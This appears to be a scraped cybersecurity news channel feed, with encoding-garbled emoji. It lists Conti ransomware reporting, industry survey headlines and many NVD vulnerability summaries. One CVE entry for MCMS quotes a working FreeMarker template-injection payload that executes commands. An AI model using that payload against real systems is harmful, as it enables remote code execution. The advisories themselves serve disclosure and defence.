βοΈ Conti Ransomware Group Diaries, Part III: Weaponry βοΈ
π Read
via "Krebs on Security".
Part I of this series examined newly-leaked internal chats from the Conti ransomware group, and how the crime gang dealt with its own internal breaches. Part II explored what it's like to be an employee of Conti's sprawling organization. Today's Part III looks at how Conti abused a panoply of popular commercial security services to undermine the security of their targets, as well as how the teamβs leaders strategized for the upper hand in ransom negotiations with victims.π Read
via "Krebs on Security".
Krebsonsecurity
Conti Ransomware Group Diaries, Part III: Weaponry
Part I of this series examined newly-leaked internal chats from the Conti ransomware group, and how the crime gang dealt with its own internal breaches. Part II explored what it's like to be an employee of Conti's sprawling organization. Today'sβ¦
βΌ CVE-2022-26484 βΌ
π Read
via "National Vulnerability Database".
An issue was discovered in Veritas InfoScale Operations Manager (VIOM) before 7.4.2 Patch 600 and 8.x before 8.0.0 Patch 100. The web server fails to sanitize admin/cgi-bin/rulemgr.pl/getfile/ input data, allowing a remote authenticated administrator to read arbitrary files on the system via Directory Traversal. By manipulating the resource name in GET requests referring to files with absolute paths, it is possible to access arbitrary files stored on the filesystem, including application source code, configuration files, and critical system files.π Read
via "National Vulnerability Database".
βΌ CVE-2021-3737 βΌ
π Read
via "National Vulnerability Database".
A flaw was found in python. An improperly handled HTTP response in the HTTP client code of python may allow a remote attacker, who controls the HTTP server, to make the client script enter an infinite loop, consuming CPU time. The highest threat from this vulnerability is to system availability.π Read
via "National Vulnerability Database".
βΌ CVE-2022-26483 βΌ
π Read
via "National Vulnerability Database".
An issue was discovered in Veritas InfoScale Operations Manager (VIOM) before 7.4.2 Patch 600 and 8.x before 8.0.0 Patch 100. A reflected cross-site scripting (XSS) vulnerability in admin/cgi-bin/listdir.pl allows authenticated remote administrators to inject arbitrary web script or HTML into an HTTP GET parameter (which reflect the user input without sanitization).π Read
via "National Vulnerability Database".
βΌ CVE-2021-27757 βΌ
π Read
via "National Vulnerability Database".
" Insecure password storage issue.The application stores sensitive information in cleartext within a resource that might be accessible to another control sphere.Since the information is stored in cleartext, attackers could potentially read it and gain access to sensitive information."π Read
via "National Vulnerability Database".
βΌ CVE-2021-3656 βΌ
π Read
via "National Vulnerability Database".
A flaw was found in the KVM's AMD code for supporting SVM nested virtualization. The flaw occurs when processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested guest (L2). Due to improper validation of the "virt_ext" field, this issue could allow a malicious L1 to disable both VMLOAD/VMSAVE intercepts and VLS (Virtual VMLOAD/VMSAVE) for the L2 guest. As a result, the L2 guest would be allowed to read/write physical pages of the host, resulting in a crash of the entire system, leak of sensitive data or potential guest-to-host escape.π Read
via "National Vulnerability Database".
βΌ CVE-2022-25106 βΌ
π Read
via "National Vulnerability Database".
D-Link DIR-859 v1.05 was discovered to contain a stack-based buffer overflow via the function genacgi_main. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted payload.π Read
via "National Vulnerability Database".
βΌ CVE-2022-23915 βΌ
π Read
via "National Vulnerability Database".
The package weblate from 0 and before 4.11.1 are vulnerable to Remote Code Execution (RCE) via argument injection when using git or mercurial repositories. Authenticated users, can change the behavior of the application in an unintended way, leading to command execution.π Read
via "National Vulnerability Database".
βΌ CVE-2022-0855 βΌ
π Read
via "National Vulnerability Database".
Improper Resolution of Path Equivalence in GitHub repository microweber-dev/whmcs_plugin prior to 0.0.4.π Read
via "National Vulnerability Database".
π΄ Most Cybersecurity Vendors at Risk Due to Internet-Exposed IT Assets π΄
π Read
via "Dark Reading".
Study shows more than 97% have exposed assets on AWS β among a wide range of other issues.π Read
via "Dark Reading".
Dark Reading
Most Cybersecurity Vendors at Risk Due to Internet-Exposed IT Assets
Study shows more than 97% have exposed assets on AWS β among a wide range of other issues.
π€―1
π΄ Companies Can't Just Train Their Way to More Secure Endpoints π΄
π Read
via "Dark Reading".
Criminals will keep stealing end-user credentials despite employee awareness, so organizations need high-tech solutions as well.π Read
via "Dark Reading".
Dark Reading
Companies Can't Just Train Their Way to More Secure Endpoints
Criminals will keep stealing end-user credentials despite employee awareness, so organizations need high-tech solutions as well.
π΄ More Than 70% of SOC Analysts Experiencing Burnout π΄
π Read
via "Dark Reading".
Nearly 65% of security operations center (SOC) analysts are likely to change jobs in the next year, survey shows.π Read
via "Dark Reading".
Dark Reading
More Than 70% of SOC Analysts Experiencing Burnout
Nearly 65% of security operations center (SOC) analysts are likely to change jobs in the next year, survey shows.
π1
β Massive Meris Botnet Embeds Ransomware Notes from REvil β
π Read
via "Threat Post".
Notes threatening to tank targeted companies' stock price were embedded into the DDoS ransomware attacks as a string_of_text directed to CEOs and webops_geeks in the URL.π Read
via "Threat Post".
Threat Post
Massive Meris Botnet Embeds Ransomware Notes from REvil
Notes threatening to tank targeted companies' stock price were embedded into the DDoS ransomware attacks as a string_of_text directed to CEOs and webops_geeks in the URL.
βΌ CVE-2021-46353 βΌ
π Read
via "National Vulnerability Database".
An information disclosure in web interface in D-Link DIR-X1860 before 1.03 RevA1 allows a remote unauthenticated attacker to send a specially crafted HTTP request and gain knowledge of different absolute paths that are being used by the web application.π Read
via "National Vulnerability Database".
βΌ CVE-2021-46384 βΌ
π Read
via "National Vulnerability Database".
https://gitee.com/mingSoft/MCMS MCMS <=5.2.5 is affected by: RCE. The impact is: execute arbitrary code (remote). The attack vector is: ${"freemarker.template.utility.Execute"?new()("calc")}. ΓΒΆΓΒΆ MCMS has a pre-auth RCE vulnerability through which allows unauthenticated attacker with network access via http to compromise MCMS. Successful attacks of this vulnerability can result in takeover of MCMS.π Read
via "National Vulnerability Database".
βΌ CVE-2021-44827 βΌ
π Read
via "National Vulnerability Database".
There is remote authenticated OS command injection on TP-Link Archer C20i 0.9.1 3.2 v003a.0 Build 170221 Rel.55462n devices vie the X_TP_ExternalIPv6Address HTTP parameter, allowing a remote attacker to run arbitrary commands on the router with root privileges.π Read
via "National Vulnerability Database".
βΌ CVE-2021-40846 βΌ
π Read
via "National Vulnerability Database".
An issue was discovered in Rhinode Trading Paints through 2.0.36. TP Updater.exe uses cleartext HTTP to check, and request, updates. Thus, attackers can man-in-the-middle a victim to download a malicious binary in place of the real update, with no SSL errors or warnings.π Read
via "National Vulnerability Database".
βΌ CVE-2021-27756 βΌ
π Read
via "National Vulnerability Database".
"TLS-RSA cipher suites are not disabled in BigFix Compliance up to v2.0.5. If TLS 2.0 and secure ciphers are not enabled then an attacker can passively record traffic and later decrypt it."π Read
via "National Vulnerability Database".
βΌ CVE-2021-43590 βΌ
π Read
via "National Vulnerability Database".
Dell EMC Enterprise Storage Analytics for vRealize Operations, versions 4.0.1 to 6.2.1, contain a Plain-text password storage vulnerability. A local high privileged malicious user may potentially exploit this vulnerability, leading to the disclosure of certain user credentials. The attacker may be able to use the exposed credentials to access the vulnerable application with privileges of the compromised account.π Read
via "National Vulnerability Database".
βΌ CVE-2021-32008 βΌ
π Read
via "National Vulnerability Database".
This issue affects: Secomea GateManager Version 9.6.621421014 and all prior versions. Improper Limitation of a Pathname to restricted directory, allows logged in GateManager admin to delete system Files or Directories.π Read
via "National Vulnerability Database".
βΌ CVE-2022-25312 βΌ
π Read
via "National Vulnerability Database".
An XML external entity (XXE) injection vulnerability was discovered in the Any23 RDFa XSLTStylesheet extractor and is known to affect Any23 versions < 2.7. XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access. This issue is fixed in Apache Any23 2.7.π Read
via "National Vulnerability Database".